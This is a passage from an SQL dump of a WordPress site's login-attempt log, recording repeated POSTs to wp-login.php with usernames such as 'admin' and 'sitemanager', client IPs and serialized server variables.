bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56460\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746849013.8719599;s:12:\"REQUEST_TIME\";i:1746849013;}}','35.154.1.88',1,'2025-05-10 09:20:16','2025-05-11 10:08:13'),(95241,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56452\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746849015.5669811;s:12:\"REQUEST_TIME\";i:1746849015;}}','35.154.1.88',1,'2025-05-10 09:20:17','2025-05-11 10:08:13'),(95242,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56447\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746849015.567615;s:12:\"REQUEST_TIME\";i:1746849015;}}','35.154.1.88',1,'2025-05-10 09:20:17','2025-05-11 10:08:13'),(95243,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56461\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746849016.6307819;s:12:\"REQUEST_TIME\";i:1746849016;}}','35.154.1.88',1,'2025-05-10 09:20:18','2025-05-11 10:08:13'),(95244,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47148\";s:11:\"REMOTE_ADDR\";s:14:\"103.191.76.181\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746849499.727684;s:12:\"REQUEST_TIME\";i:1746849499;}}','103.191.76.181',0,'2025-05-10 09:28:21','1970-01-01 00:00:00'),(95245,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50848\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746849730.1865301;s:12:\"REQUEST_TIME\";i:1746849730;}}','35.154.1.88',1,'2025-05-10 09:32:12','2025-05-11 10:08:13'),(95246,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50845\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746849730.1871941;s:12:\"REQUEST_TIME\";i:1746849730;}}','35.154.1.88',1,'2025-05-10 09:32:12','2025-05-11 10:08:13'),(95247,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50851\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746849731.8786089;s:12:\"REQUEST_TIME\";i:1746849731;}}','35.154.1.88',1,'2025-05-10 09:32:13','2025-05-11 10:08:13'),(95248,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50847\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746849731.8780451;s:12:\"REQUEST_TIME\";i:1746849731;}}','35.154.1.88',1,'2025-05-10 09:32:13','2025-05-11 10:08:13'),(95249,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50852\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746849732.948422;s:12:\"REQUEST_TIME\";i:1746849732;}}','35.154.1.88',1,'2025-05-10 09:32:14','2025-05-11 10:08:13'),(95250,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36570\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.95.176\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746850107.5278749;s:12:\"REQUEST_TIME\";i:1746850107;}}','157.230.95.176',0,'2025-05-10 09:38:30','1970-01-01 00:00:00'),(95251,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58361\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746850459.5444109;s:12:\"REQUEST_TIME\";i:1746850459;}}','35.154.1.88',1,'2025-05-10 09:44:21','2025-05-11 